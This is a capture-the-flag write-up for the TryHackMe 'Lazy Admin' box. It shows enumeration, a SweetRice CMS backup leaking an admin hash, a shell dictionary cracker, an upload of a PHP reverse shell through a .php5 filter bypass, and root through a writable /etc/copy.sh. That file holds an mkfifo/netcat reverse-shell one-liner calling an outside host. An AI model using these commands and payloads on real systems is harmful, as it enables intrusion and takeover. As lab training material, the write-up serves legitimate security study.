
Lazy Admin | Tryhackme | Easy


Enumeration

┌──(root㉿kali)-[/home/local_host/Desktop/THM]
└─# nmap -sV 10.10.39.105
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 11:35 IST
Nmap scan report for 10.10.39.105
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

Only SSH and HTTP are exposed, so let's check out port 80.


It's the stock Apache2 Ubuntu default page, so the real application lives somewhere else. Let's discover directories with gobuster.

┌──(root㉿kali)-[/home/local_host/Desktop/THM]
└─# gobuster dir -u 10.10.39.105 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.html            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/content              (Status: 301) [Size: 314] [--> http://10.10.39.105/content/]
/index.html           (Status: 200) [Size: 11321]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 277]

The interesting hit is /content.

Browsing to it shows a SweetRice notice page, so there is a CMS installed under /content.

Let's enumerate the subdirectories of /content as well.

┌──(root㉿kali)-[/home/local_host/Desktop/THM]
└─# gobuster dir -u 10.10.39.105/content -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.html            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/_themes              (Status: 301) [Size: 322] [--> http://10.10.39.105/content/_themes/]
/as                   (Status: 301) [Size: 317] [--> http://10.10.39.105/content/as/]
/attachment           (Status: 301) [Size: 325] [--> http://10.10.39.105/content/attachment/]
/changelog.txt        (Status: 200) [Size: 18013]
/images               (Status: 301) [Size: 321] [--> http://10.10.39.105/content/images/]
/inc                  (Status: 301) [Size: 318] [--> http://10.10.39.105/content/inc/]
/index.php            (Status: 200) [Size: 2198]
/index.php            (Status: 200) [Size: 2198]
/js                   (Status: 301) [Size: 317] [--> http://10.10.39.105/content/js/]
/license.txt          (Status: 200) [Size: 15410]

changelog.txt 🔍

#############################################
SweetRice - Simple Website Management System
Version 1.5.0
Author:Hiler Liu steelcal@gmail.com
Home page:http://www.basic-cms.org/
#############################################
New web - new SweetRice for both PC & mobile website creator,easy way to follow the new web world.

========================================

The changelog header tells us the target runs SweetRice CMS, reporting version 1.5.0 (the backup file name found next carries 1.5.1, and the public exploits used below target 1.5.1). Let's search Exploit-DB for SweetRice.

Exploit-DB lists a backup-disclosure issue for SweetRice 1.5.1: the CMS stores its MySQL backups inside the web root, under the /content/inc/ directory found above, and the backup directory can be browsed directly. Download and open the mysql_bakup_20191129023059-1.5.1.sql file.

The dump contains the admin username and the password hash for the CMS login. The hash is unsalted, so it cracks quickly offline; the screenshot used CrackStation, and hashcat against rockyou.txt gives the same result.
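For readers without hashcat or CrackStation to hand, here is an added example (not from the write-up) of the same offline dictionary attack: a POSIX shell function that picks the digest from the hash length and walks a wordlist. The wordlist and the hash below are constructed for the demo (the hash is md5("password")); on the box the hash comes from the .sql dump.

```shell
#!/bin/sh
# Added example (not part of the write-up): minimal offline dictionary cracker
# for an unsalted hash leaked by a CMS backup. Demo inputs are constructed.

# crack_hash HEXHASH WORDLIST -> prints the matching word and returns 0,
# returns 1 if no candidate matches, 2 if the hash length is unknown.
# Digest is chosen from the hash length: 32 = MD5, 40 = SHA-1, 64 = SHA-256.
crack_hash() {
  target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  wordlist=$2
  case ${#target} in
    32) algo=md5sum ;;
    40) algo=sha1sum ;;
    64) algo=sha256sum ;;
    *)  echo "unsupported hash length ${#target}" >&2; return 2 ;;
  esac
  while IFS= read -r word || [ -n "$word" ]; do
    # printf, not echo: the trailing newline must not be part of the digest
    h=$(printf '%s' "$word" | "$algo" | cut -d' ' -f1)
    if [ "$h" = "$target" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# Constructed wordlist standing in for rockyou.txt
DEMO_WORDLIST=$(mktemp)
printf '%s\n' admin letmein Password1 password > "$DEMO_WORDLIST"

# Constructed target hash: md5("password")
crack_hash 5f4dcc3b5aa765d61d8327deb882cf99 "$DEMO_WORDLIST"
```

Because the hash is unsalted, every candidate costs one digest and a few million guesses finish in seconds; that is exactly why a readable backup of the CMS user table is a critical finding on its own.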

With the username and the cracked password we can log in to the SweetRice admin panel under /content/as/.

SweetRice 1.5.1 also has an authenticated arbitrary file upload vulnerability, and Exploit-DB has a script for it. We configure a PHP reverse shell with our own address (10.17.15.106:1234), start a netcat listener, and let the script upload it. Note the uploaded name ends in .php5: the upload filter does not reject that extension, and on Ubuntu the PHP module's Apache configuration maps .php3/.php4/.php5/.phtml to the PHP handler alongside .php, so the file is still executed when requested.

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.39.105/content/attachment/shell.php5


โฏ nc -nlvp 1234
Connection from 10.10.39.105:44046
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 09:34:23 up 33 min,  0 users,  load average: 0.00, 0.01, 0.24
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

We land as www-data. Let's navigate the file system to find user.txt.

$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{63e5bce927******************}

Privilege Escalation

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

backup.pl does nothing but hand /etc/copy.sh to sh. Since sudo lets www-data run backup.pl as root without a password, whatever /etc/copy.sh contains runs as root, so the thing to check is whether www-data can write to /etc/copy.sh.

$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

The script already holds a netcat reverse shell, but pointed at an unreachable address (192.168.0.190:5554). /etc/copy.sh turns out to be writable by www-data (the echo below succeeds), so we can replace its contents with our own payload and have backup.pl run it as root. Reusing the PHP reverse shell we already uploaded, via the php CLI, is the quickest option; a plain mkfifo/nc one-liner pointed at our own IP and port would work just as well.

$ echo 'php /var/www/html/content/attachment/shell.php5' > /etc/copy.sh

Start a fresh listener on port 1234, then run backup.pl through sudo; copy.sh now executes as root and the PHP shell calls back with root privileges.

$ sudo /usr/bin/perl /home/itguy/backup.pl
$ Successfully opened reverse shell to 10.17.15.106:1234
$ nc -nlvp 1234
Connection from 10.10.39.105:44052
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 09:46:00 up 44 min,  0 users,  load average: 0,00, 0,00, 0,09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{6637f41d01***************}

CONGRATULATIONS! 💫

This post is licensed under CC BY 4.0 by the author.
